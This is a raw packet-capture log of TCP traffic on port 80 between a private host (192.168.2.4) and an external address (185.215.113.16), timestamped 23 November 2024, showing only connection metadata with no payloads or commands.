                                                                                                                                                                                  Nov 23, 2024 14:46:39.317075968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.318450928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.318494081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.318519115 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.319806099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.319838047 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.319869995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.321209908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.321265936 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.321348906 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.322583914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.322612047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.322627068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.323976040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.324022055 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.324049950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.325381041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.325432062 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.325473070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.326770067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.326809883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.326867104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.328175068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.328217030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.328232050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.329565048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.329607010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.329684973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.331015110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.331052065 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.331137896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.332529068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.332591057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.332665920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.333782911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.333825111 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.333911896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.335163116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.335203886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.335216999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.336570978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.336606979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.336678982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.337984085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.338028908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.338193893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.339425087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.339436054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.339459896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.340778112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.340822935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.341022968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.342154980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.342195988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.342211962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.343590975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.343652010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.343696117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.345093012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.345134974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.345179081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.346349001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.346390963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.346509933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.347752094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.347795010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.347879887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.349160910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.349206924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.349229097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.350611925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.350652933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.350667953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.351944923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.351988077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.352052927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.353343010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.353387117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.353454113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.355233908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.355274916 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.355446100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.356244087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.356286049 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.356337070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.357656956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.357702017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.357831955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.358968973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.359011889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.359155893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.360369921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.360413074 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.360482931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.361754894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.361799955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.361895084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.363137960 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.363179922 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.447525024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.447560072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.447618961 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.448157072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.448435068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.448513031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.448651075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.449853897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.449896097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.449938059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.451251030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.451291084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.473547935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.473607063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.473654985 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.474172115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.474379063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.474441051 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.475574017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.475667953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.475711107 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.476949930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.477065086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.477108002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.478353977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.478466034 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.478507996 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.479734898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.479793072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.479830980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.481118917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.481224060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.481267929 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.482517004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.482636929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.482681036 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.483906984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.484076977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.484124899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.485270977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.485425949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.485476971 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.486742020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.486937046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.486979008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.488075972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.488188028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.488231897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.489500999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.489562988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.489619970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.490859032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.490967035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.491020918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.492238045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.492496014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.492535114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.493621111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.493738890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.493791103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.495023966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.495121002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.495160103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.496396065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.496612072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.496651888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.497785091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.497893095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.497929096 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.499167919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.499272108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.499310970 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.500555038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.500662088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.500704050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.501677990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.501871109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.501940012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.502743006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.502851963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.502892017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.503829956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.503962040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.504003048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.504982948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.505074024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.505112886 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.505964041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.506093979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.506134987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.507056952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.507143021 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.507184982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.508136988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.508248091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.508289099 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.509219885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.509285927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.509326935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.510298014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.510433912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.510477066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.511356115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.511449099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.511487007 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.512447119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.512521982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.512577057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.513480902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.513597012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.513634920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.514544964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.514668941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.514707088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.515647888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.515896082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.515937090 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.516721964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.516827106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.516865015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.517791986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.517891884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.517930984 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.518871069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.518975973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.519013882 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.519970894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.520091057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.520129919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.521017075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.521115065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.521157980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.522082090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.522177935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.522218943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.523165941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.523293018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.523345947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.524254084 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.524327993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.524368048 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.525314093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.525388002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.525429964 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.526401997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.526541948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.526583910 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.527483940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.527611971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.527664900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.528548002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.528661013 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.528706074 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.529596090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.529741049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.529778957 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.530702114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.530797005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.530837059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.531764030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.531860113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.531902075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.639712095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.639770031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.639833927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.640157938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.640261889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.640320063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.641256094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.641356945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.641397953 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.642328978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.671124935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.671194077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.671323061 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.671627045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.671670914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.671698093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.672632933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.672689915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.672723055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.673712969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.673758030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.673809052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.674787045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.674828053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:39.674890041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.675874949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:39.675915003 CET4974480192.168.2.4185.215.113.16
